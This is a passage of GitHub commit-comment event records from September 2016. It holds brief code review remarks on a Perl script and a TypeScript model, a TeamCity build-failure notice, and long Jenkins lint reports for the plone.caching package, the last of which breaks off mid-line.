{"id":"4501461186","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860798,"position":38,"line":38,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T09:28:50Z","updated_at":"2016-09-01T09:28:50Z","body":"I would use `IO::File` here."}},"created_at":"2016-09-01T09:28:50Z"}
{"id":"4501462614","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.caching"},"payload":{"comment":{"id":18860805,"position":null,"line":null,"path":null,"commit_id":"2dfdf73b3a1ce7291d2d364ad159cc379a83ed42","created_at":"2016-09-01T09:29:08Z","updated_at":"2016-09-01T09:29:08Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.caching/1/violations\n```\nplone/__init__.py:0:1: C101 Coding magic comment not found\nplone/caching/hooks.py:0:1: C101 Coding magic comment not found\nplone/caching/hooks.py:0:1: I001 isort found changes, run it on the file\nplone/caching/hooks.py:25:1: E302 expected 2 blank lines, found 1\nplone/caching/hooks.py:32:1: E302 expected 2 blank lines, found 1\nplone/caching/hooks.py:45:1: E302 expected 2 blank lines, found 1\nplone/caching/hooks.py:57:1: E302 expected 2 blank lines, found 1\nplone/caching/hooks.py:78:22: Q000 Remove bad quotes.\nplone/caching/hooks.py:78:80: E501 line too long (97 > 79 characters)\nplone/caching/hooks.py:89:80: E501 line too long (83 > 79 characters)\nplone/caching/hooks.py:108:5: B901 blind except: statement\nplone/caching/hooks.py:109:27: Q000 Remove bad quotes.\nplone/caching/hooks.py:109:80: E501 line too long (98 > 79 characters)\nplone/caching/hooks.py:111:1: E302 expected 2 blank lines, found 1\nplone/caching/hooks.py:164:22: Q000 Remove bad quotes.\nplone/caching/hooks.py:164:80: E501 line too long (97 > 79 characters)\nplone/caching/hooks.py:174:1: E302 expected 2 blank lines, found 1\nplone/caching/hooks.py:200:18: Q000 Remove bad quotes.\nplone/caching/hooks.py:200:80: E501 line too long (93 > 79 characters)\nplone/caching/interfaces.py:0:1: C101 Coding magic comment not found\nplone/caching/interfaces.py:0:1: I001 isort found changes, run it on the file\nplone/caching/interfaces.py:8:20: E221 multiple spaces before operator\nplone/caching/interfaces.py:11:1: E302 expected 2 blank lines, found 1\nplone/caching/interfaces.py:17:80: E501 line too long (82 > 79 characters)\nplone/caching/interfaces.py:32:1: E302 expected 2 blank lines, found 1\nplone/caching/lookup.py:0:1: C101 Coding magic comment not found\nplone/caching/lookup.py:0:1: I001 isort found changes, run it on the file\nplone/caching/lookup.py:8:1: E302 expected 2 blank lines, found 1\nplone/caching/operations.py:0:1: C101 Coding magic comment not found\nplone/caching/operations.py:0:1: I001 isort found changes, run it on the file\nplone/caching/operations.py:10:1: E302 expected 2 blank lines, found 1\nplone/caching/operations.py:49:46: E128 continuation line under-indented for visual indent\nplone/caching/operations.py:56:80: E501 line too long (90 > 79 characters)\nplone/caching/operations.py:68:46: E128 continuation line under-indented for visual indent\nplone/caching/testing.py:0:1: C101 Coding magic comment not found\nplone/caching/testing.py:0:1: I001 isort found changes, run it on the file\nplone/caching/utils.py:0:1: C101 Coding magic comment not found\nplone/caching/utils.py:0:1: I001 isort found changes, run it on the file\nplone/caching/utils.py:13:1: E302 expected 2 blank lines, found 1\nplone/caching/utils.py:33:80: E501 line too long (89 > 79 characters)\nplone/caching/utils.py:37:1: E302 expected 2 blank lines, found 1\nplone/caching/utils.py:51:80: E501 line too long (84 > 79 characters)\nplone/caching/utils.py:60:11: Q000 Remove bad quotes.\nplone/caching/utils.py:60:12: S001 found %s formatter\nplone/caching/utils.py:64:11: Q000 Remove bad quotes.\nplone/caching/utils.py:64:12: S001 found %s formatter\nplone/caching/utils.py:70:1: E302 expected 2 blank lines, found 1\nplone/caching/utils.py:105:80: E501 line too long (94 > 79 characters)\nplone/caching/tests/test_hooks.py:0:1: C101 Coding magic comment not found\nplone/caching/tests/test_hooks.py:0:1: I001 isort found changes, run it on the file\nplone/caching/tests/test_hooks.py:31:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:34:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:38:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:52:5: E301 expected 1 blank line, found 0\nplone/caching/tests/test_hooks.py:55:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:61:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:65:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:69:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:86:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:88:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:89:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:96:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:98:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:99:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:107:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:109:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:110:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:125:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:127:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:128:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:143:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:145:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:146:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:161:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:163:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:164:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:180:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:182:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:183:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:183:80: E501 line too long (81 > 79 characters)\nplone/caching/tests/test_hooks.py:199:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:201:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:202:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:202:80: E501 line too long (81 > 79 characters)\nplone/caching/tests/test_hooks.py:229:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:234:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:236:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:237:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:266:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:271:56: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:271:60: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:273:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:274:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:303:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:308:60: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:308:65: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:310:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:311:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:340:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:345:67: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:347:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:348:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:377:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:382:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:384:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:385:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:387:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:411:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:412:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:424:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:425:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:438:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:439:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:458:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:459:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:478:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:479:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:498:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:499:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:519:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:520:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:520:80: E501 line too long (81 > 79 characters)\nplone/caching/tests/test_hooks.py:540:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:541:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:541:80: E501 line too long (81 > 79 characters)\nplone/caching/tests/test_hooks.py:568:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:577:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:578:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:607:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:616:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:617:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:646:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:655:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:656:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:685:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:694:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:695:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:724:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:733:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:734:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:736:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:754:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:755:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:764:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:765:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:776:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:777:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:793:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:794:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:812:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:813:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:830:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:831:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:831:80: E501 line too long (81 > 79 characters)\nplone/caching/tests/test_hooks.py:859:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:865:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:866:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:896:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:904:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:905:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:906:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:907:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:911:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:912:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:912:80: E501 line too long (82 > 79 characters)\nplone/caching/tests/test_hooks.py:913:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:945:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:953:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:954:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:955:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:956:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:960:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:961:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:961:80: E501 line too long (83 > 79 characters)\nplone/caching/tests/test_hooks.py:962:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:993:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:1001:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1002:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1003:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1004:18: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1008:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1009:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1009:80: E501 line too long (82 > 79 characters)\nplone/caching/tests/test_hooks.py:1010:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1040:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:1045:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1046:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1085:38: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:1101:9: B901 blind except: statement\nplone/caching/tests/test_hooks.py:1102:23: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:1109:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:1111:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_lookup.py:0:1: C101 Coding magic comment not found\nplone/caching/tests/test_lookup.py:0:1: I001 isort found changes, run it on the file\nplone/caching/tests/test_lookup.py:13:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_lookup.py:18:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_lookup.py:23:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_lookup.py:30:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_lookup.py:36:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_lookup.py:38:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_operations.py:0:1: C101 Coding magic comment not found\nplone/caching/tests/test_operations.py:0:1: I001 isort found changes, run it on the file\nplone/caching/tests/test_operations.py:21:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_operations.py:24:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_operations.py:32:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_operations.py:54:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:55:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:56:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:60:31: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:60:32: S001 found %s formatter\nplone/caching/tests/test_operations.py:60:80: E501 line too long (84 > 79 characters)\nplone/caching/tests/test_operations.py:69:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:70:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:71:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:75:31: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:75:32: S001 found %s formatter\nplone/caching/tests/test_operations.py:75:80: E501 line too long (88 > 79 characters)\nplone/caching/tests/test_operations.py:84:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:85:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:86:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:90:31: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:90:32: S001 found %s formatter\nplone/caching/tests/test_operations.py:90:80: E501 line too long (93 > 79 characters)\nplone/caching/tests/test_operations.py:98:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:99:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:102:31: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:102:32: S001 found %s formatter\nplone/caching/tests/test_operations.py:102:80: E501 line too long (100 > 79 characters)\nplone/caching/tests/test_operations.py:121:45: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:126:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:127:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:128:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:128:80: E501 line too long (86 > 79 characters)\nplone/caching/tests/test_operations.py:134:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:135:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:136:80: E501 line too long (86 > 79 characters)\nplone/caching/tests/test_operations.py:139:31: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:139:32: S001 found %s formatter\nplone/caching/tests/test_operations.py:139:80: E501 line too long (100 > 79 characters)\nplone/caching/tests/test_operations.py:158:46: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:174:46: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:179:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:180:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:181:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:181:80: E501 line too long (86 > 79 characters)\nplone/caching/tests/test_operations.py:187:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:188:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:190:80: E501 line too long (91 > 79 characters)\nplone/caching/tests/test_operations.py:192:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_utils.py:0:1: C101 Coding magic comment not found\nplone/caching/tests/test_utils.py:0:1: I001 isort found changes, run it on the file\nplone/caching/tests/test_utils.py:17:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_utils.py:23:80: E501 line too long (89 > 79 characters)\nplone/caching/tests/test_utils.py:24:14: D001 found failUnless( replace it with assertTrue\nplone/caching/tests/test_utils.py:29:80: E501 line too long (89 > 79 characters)\nplone/caching/tests/test_utils.py:30:14: D001 found failUnless( replace it with assertTrue\nplone/caching/tests/test_utils.py:36:53: E221 multiple spaces before operator\nplone/caching/tests/test_utils.py:36:80: E501 line too long (92 > 79 characters)\nplone/caching/tests/test_utils.py:38:80: E501 line too long (89 > 79 characters)\nplone/caching/tests/test_utils.py:39:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:45:80: E501 line too long (95 > 79 characters)\nplone/caching/tests/test_utils.py:46:62: E221 multiple spaces before operator\nplone/caching/tests/test_utils.py:46:80: E501 line too long (115 > 79 characters)\nplone/caching/tests/test_utils.py:48:80: E501 line too long (89 > 79 characters)\nplone/caching/tests/test_utils.py:49:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:51:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_utils.py:67:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:81:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:87:80: E501 line too long (88 > 79 characters)\nplone/caching/tests/test_utils.py:98:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:104:80: E501 line too long (88 > 79 characters)\nplone/caching/tests/test_utils.py:105:80: E501 line too long (88 > 79 characters)\nplone/caching/tests/test_utils.py:106:80: E501 line too long (97 > 79 characters)\nplone/caching/tests/test_utils.py:117:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:123:80: E501 line too long (88 > 79 characters)\nplone/caching/tests/test_utils.py:135:80: E501 line too long (83 > 79 characters)\nplone/caching/tests/test_utils.py:136:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:138:1: E302 expected 2 blank lines, found 1\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-01T09:29:08Z"}
{"id":"4501463229","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860806,"position":38,"line":38,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T09:29:15Z","updated_at":"2016-09-01T09:29:15Z","body":"Filehandle is never closed."}},"created_at":"2016-09-01T09:29:15Z"}
{"id":"4501463846","type":"CommitCommentEvent","actor":{"login":"judoteamcity"},"repo":{"name":"JudoPay/Judo-Android"},"payload":{"comment":{"id":18860808,"position":null,"line":null,"path":null,"commit_id":"a53e670cd90c3caf6d0855cbeda3dabd8ecd5f93","created_at":"2016-09-01T09:29:22Z","updated_at":"2016-09-01T09:29:22Z","body":"TeamCity Mobile :: Android :: Android SDK (develop) [Build 685](http://teamcity/viewLog.html?buildId=55438&buildTypeId=JudoAndroid_AndroidGradle) outcome was **FAILURE**\nSummary: Execution timeout (new); tests passed: 59 Build time: 00:31:11"}},"created_at":"2016-09-01T09:29:22Z"}
{"id":"4501464884","type":"CommitCommentEvent","actor":{"login":"peta15"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18860811,"position":20,"line":20,"path":"app/models/devices/philips_hue_light.ts","commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T09:29:34Z","updated_at":"2016-09-01T09:29:34Z","body":"any way we could change Object in the name to something more descriptive?"}},"created_at":"2016-09-01T09:29:34Z"}
{"id":"4501465039","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.caching"},"payload":{"comment":{"id":18860814,"position":null,"line":null,"path":null,"commit_id":"b3acecc623766118fb103c80c9972690d74cef41","created_at":"2016-09-01T09:29:36Z","updated_at":"2016-09-01T09:29:36Z","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.caching/2/violations\n```\nplone/caching/hooks.py:112:5: B901 blind except: statement\nplone/caching/utils.py:69:11: Q000 Remove bad quotes.\nplone/caching/utils.py:69:12: S001 found %s formatter\nplone/caching/utils.py:73:11: Q000 Remove bad quotes.\nplone/caching/utils.py:73:12: S001 found %s formatter\nplone/caching/tests/test_hooks.py:32:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:36:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:50:5: E301 expected 1 blank line, found 0\nplone/caching/tests/test_hooks.py:53:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:59:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:63:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:67:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:84:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:86:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:87:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:94:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:96:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:97:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:105:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:107:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:108:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:123:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:125:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:126:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:141:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:143:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:144:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:159:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:161:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:162:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:178:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:180:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:181:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:181:80: E501 line too long (81 > 79 characters)\nplone/caching/tests/test_hooks.py:197:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:199:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:200:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:200:80: E501 line too long (81 > 79 characters)\nplone/caching/tests/test_hooks.py:227:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:232:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:234:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:235:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:264:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:269:56: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:269:60: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:271:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:272:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:301:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:306:60: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:306:65: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:308:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:309:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:338:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:343:67: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:345:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:346:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:375:45: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:380:63: Q000 Remove bad quotes.\nplone/caching/tests/test_hooks.py:382:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:383:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:385:1: E302 expected 2 blank lines, found 1\nplone/caching/tests/test_hooks.py:409:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:410:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:422:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:423:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:436:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:437:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:456:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:457:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:476:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:477:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:496:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:497:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:517:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:518:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_hooks.py:518:80: E501 line too long (81 > 79 characters)\nplone/caching/tests/test_hooks.py:538:14: D001 found assertEquals replace it with 